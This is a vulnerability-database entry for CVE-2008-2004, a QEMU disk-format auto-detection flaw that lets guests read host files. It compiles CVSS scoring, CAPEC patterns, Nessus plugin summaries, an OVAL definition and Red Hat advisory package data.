Vulnerabilities > CVE-2008-2004 - Information Exposure vulnerability in Qemu 0.9.1

047910
CVSS 4.9 - MEDIUM
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
NONE
Availability impact
NONE
local
low complexity
qemu
CWE-200
nessus

Summary

The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.

Vulnerable Configurations

Part Description Count
Application
Qemu
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Nessus

  • NASL familyOracleVM Local Security Checks
    NASL idORACLEVM_OVMSA-2008-2003.NASL
    descriptionThe remote OracleVM system is missing necessary patches to address critical security updates : - Disable QEMU image format auto-detection (CVE-2008-2004) - Fix PVFB to validate frame buffer description - Fix PVFB to cope with bogus update requests - Fix QEMU buffer overflow (CVE-2007-5730) - Fix QEMU block device extents checking (CVE-2008-0928) - Fix FV O_DIRECT flushing
    last seen2020-06-01
    modified2020-06-02
    plugin id79446
    published2014-11-26
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79446
    titleOracleVM 2.1 : xen (OVMSA-2008-2003)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2008-0194.NASL
    descriptionUpdated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen2020-06-01
    modified2020-06-02
    plugin id43678
    published2010-01-06
    reporterThis script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/43678
    titleCentOS 5 : xen (CESA-2008:0194)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-776-2.NASL
    descriptionUSN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a regression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to boot virtual machines started via libvirt. This update fixes the problem. We apologize for the inconvenience. Avi Kivity discovered that KVM did not correctly handle certain disk formats. A local attacker could attach a malicious partition that would allow the guest VM to read files on the VM host. (CVE-2008-1945, CVE-2008-2004) Alfredo Ortega discovered that KVM
    last seen2020-06-01
    modified2020-06-02
    plugin id38777
    published2009-05-14
    reporterUbuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/38777
    titleUbuntu 8.04 LTS : kvm regression (USN-776-2)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_8950AC621D3011DD93880211060005DF.NASL
    descriptionSecunia reports : A vulnerability has been reported in QEMU, which can be exploited by malicious, local users to bypass certain security restrictions. The vulnerability is caused due to the
    last seen2020-06-01
    modified2020-06-02
    plugin id32147
    published2008-05-09
    reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/32147
    titleFreeBSD : qemu -- 'drive_init()' Disk Format Security Bypass (8950ac62-1d30-11dd-9388-0211060005df)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20080513_XEN_ON_SL5_X.NASL
    descriptionNote: Troy Dawson has tested this update on a machine hosting both paravirtualized and fully virtualized machines, both 32 bit and 64 bit. He did the update while all the machines were running, none of them had any problems. He also tried stopping, starting, and rebooting several of the machines. All without any problems. We tell you this because updating the xen package, while running virtual machines, can make you a little nervous. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen2020-06-01
    modified2020-06-02
    plugin id60398
    published2012-08-01
    reporterThis script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/60398
    titleScientific Linux Security Update : xen on SL5.x i386/x86_64
  • NASL familyMandriva Local Security Checks
    NASL idMANDRIVA_MDVSA-2008-162.NASL
    descriptionMultiple vulnerabilities have been found in Qemu. Multiple heap-based buffer overflows in the cirrus_invalidate_region function in the Cirrus VGA extension in QEMU 0.8.2, as used in Xen and possibly other products, might allow local users to execute arbitrary code via unspecified vectors related to attempting to mark non-existent regions as dirty, aka the bitblt heap overflow. (CVE-2007-1320) Integer signedness error in the NE2000 emulator in QEMU 0.8.2, as used in Xen and possibly other products, allows local users to trigger a heap-based buffer overflow via certain register values that bypass sanity checks, aka QEMU NE2000 receive integer signedness error. (CVE-2007-1321) QEMU 0.8.2 allows local users to halt a virtual machine by executing the icebp instruction. (CVE-2007-1322) QEMU 0.8.2 allows local users to crash a virtual machine via the divisor operand to the aam instruction, as demonstrated by aam 0x0, which triggers a divide-by-zero error. (CVE-2007-1366) The NE2000 emulator in QEMU 0.8.2 allows local users to execute arbitrary code by writing Ethernet frames with a size larger than the MTU to the EN0_TCNT register, which triggers a heap-based buffer overflow in the slirp library, aka NE2000 mtu heap overflow. (CVE-2007-5729) Heap-based buffer overflow in QEMU 0.8.2, as used in Xen and possibly other products, allows local users to execute arbitrary code via crafted data in the net socket listen option, aka QEMU net socket heap overflow. (CVE-2007-5730) QEMU 0.9.0 allows local users of a Windows XP SP2 guest operating system to overwrite the TranslationBlock (code_gen_buffer) buffer, and probably have unspecified other impacts related to an overflow, via certain Windows executable programs, as demonstrated by qemu-dos.com. (CVE-2007-6227) Qemu 0.9.1 and earlier does not perform range checks for block device read or write requests, which allows guest host users with root privileges to access arbitrary memory and escape the virtual machine. (CVE-2008-0928) Changing removable media in QEMU could trigger a bug similar to CVE-2008-2004, which would allow local guest users to read arbitrary files on the host by modifying the header of the image to identify a different format. (CVE-2008-1945) See the diskformat: parameter to the -usbdevice option. The drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted. (CVE-2008-2004) See the -format option. The updated packages have been patched to fix these issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id37509
    published2009-04-23
    reporterThis script is Copyright (C) 2009-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/37509
    titleMandriva Linux Security Advisory : qemu (MDVSA-2008:162)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2008-0194.NASL
    descriptionUpdated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen2020-06-01
    modified2020-06-02
    plugin id32354
    published2008-05-16
    reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/32354
    titleRHEL 5 : xen (RHSA-2008:0194)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-776-1.NASL
    descriptionAvi Kivity discovered that KVM did not correctly handle certain disk formats. A local attacker could attach a malicious partition that would allow the guest VM to read files on the VM host. (CVE-2008-1945, CVE-2008-2004) Alfredo Ortega discovered that KVM
    last seen2020-06-01
    modified2020-06-02
    plugin id38759
    published2009-05-13
    reporterUbuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/38759
    titleUbuntu 8.04 LTS / 8.10 : kvm vulnerabilities (USN-776-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_QEMU-5270.NASL
    descriptionLocal attackers could use raw formatted disk images to access the hosting environment. CVE-2008-2004 has been assigned to this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id33163
    published2008-06-12
    reporterThis script is Copyright (C) 2008-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/33163
    titleopenSUSE 10 Security Update : qemu (qemu-5270)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2008-0194.NASL
    descriptionFrom Red Hat Security Advisory 2008:0194 : Updated xen packages that fix several security issues and a bug are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The xen packages contain tools for managing the virtual machine monitor in Red Hat Virtualization. These updated packages fix the following security issues : Daniel P. Berrange discovered that the hypervisor
    last seen2020-06-01
    modified2020-06-02
    plugin id67671
    published2013-07-12
    reporterThis script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/67671
    titleOracle Linux 5 : xen (ELSA-2008-0194)

Oval

accepted2013-04-29T04:10:49.864-04:00
classvulnerability
contributors
  • nameAharon Chernin
    organizationSCAP.com, LLC
  • nameDragos Prisaca
    organizationG2, Inc.
definition_extensions
  • commentThe operating system installed on the system is Red Hat Enterprise Linux 5
    ovaloval:org.mitre.oval:def:11414
  • commentThe operating system installed on the system is CentOS Linux 5.x
    ovaloval:org.mitre.oval:def:15802
  • commentOracle Linux 5.x
    ovaloval:org.mitre.oval:def:15459
descriptionThe drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
familyunix
idoval:org.mitre.oval:def:11021
statusaccepted
submitted2010-07-09T03:56:16-04:00
titleThe drive_init function in QEMU 0.9.1 determines the format of a raw disk image based on the header, which allows local guest users to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted.
version18

Redhat

advisories
bugzilla
id444583
titleCVE-2008-2004 qemu/kvm/xen: qemu block format auto-detection vulnerability
oval
OR
  • commentRed Hat Enterprise Linux must be installed
    ovaloval:com.redhat.rhba:tst:20070304026
  • AND
    • commentRed Hat Enterprise Linux 5 is installed
      ovaloval:com.redhat.rhba:tst:20070331005
    • OR
      • AND
        • commentxen-libs is earlier than 0:3.0.3-41.el5_1.5
          ovaloval:com.redhat.rhsa:tst:20080194001
        • commentxen-libs is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20070114002
      • AND
        • commentxen is earlier than 0:3.0.3-41.el5_1.5
          ovaloval:com.redhat.rhsa:tst:20080194003
        • commentxen is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20070114004
      • AND
        • commentxen-devel is earlier than 0:3.0.3-41.el5_1.5
          ovaloval:com.redhat.rhsa:tst:20080194005
        • commentxen-devel is signed with Red Hat redhatrelease key
          ovaloval:com.redhat.rhsa:tst:20070114006
rhsa
idRHSA-2008:0194
released2008-05-13
severityImportant
titleRHSA-2008:0194: xen security and bug fix update (Important)
rpms
  • xen-0:3.0.3-41.el5_1.5
  • xen-debuginfo-0:3.0.3-41.el5_1.5
  • xen-devel-0:3.0.3-41.el5_1.5
  • xen-libs-0:3.0.3-41.el5_1.5